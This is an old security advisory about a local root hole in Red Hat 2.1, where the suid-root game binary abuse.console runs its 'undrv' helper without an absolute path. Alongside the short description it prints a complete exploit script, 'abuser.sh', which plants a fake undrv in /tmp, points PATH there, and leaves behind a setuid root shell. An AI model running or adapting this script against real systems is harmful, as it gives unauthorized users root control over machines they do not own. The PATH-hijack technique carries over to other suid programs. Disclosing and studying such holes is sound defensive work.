COMMAND

    /usr/lib/games/abuse/abuse.console suid root

SYSTEMS AFFECTED

    Red Hat 2.1 linux distribution

PROBLEM

    There is a security hole in Red Hat 2.1, which installs the game
    abuse with /usr/lib/games/abuse/abuse.console suid root. The
    abuse.console program loads its files without absolute pathnames,
    assuming the user is running abuse from the /usr/lib/games/abuse
    directory. One of these files is the undrv program, which abuse
    executes as root. If the user is not in the abuse directory when
    running this, an arbitrary program can be substituted for undrv,
    allowing the user to execute arbitrary commands as root. If
    abuse.console needs to be run by users other than root at the
    console, provisions need to be made in the code to not execute
    or load any files as root.

        #!/bin/sh
        #
        echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system
        echo ================ Checking system vulnerability
        if test -u /usr/lib/games/abuse/abuse.console
        then
        echo ++++++++++++++++ System appears vulnerable.
        cd /tmp
        cat << _EOF_ > /tmp/undrv
        #!/bin/sh
        /bin/cp /bin/sh /tmp/abuser
        /bin/chmod 4777 /tmp/abuser
        _EOF_
        chmod +x /tmp/undrv
        PATH=/tmp
        echo ================ Executing Abuse
        /usr/lib/games/abuse/abuse.console
        /bin/rm /tmp/undrv
        if test -u /tmp/abuser
        then
        echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser
        else
        echo ---------------- Exploit failed
        fi
        else
        echo ---------------- This machine does not appear to be vulnerable.
        fi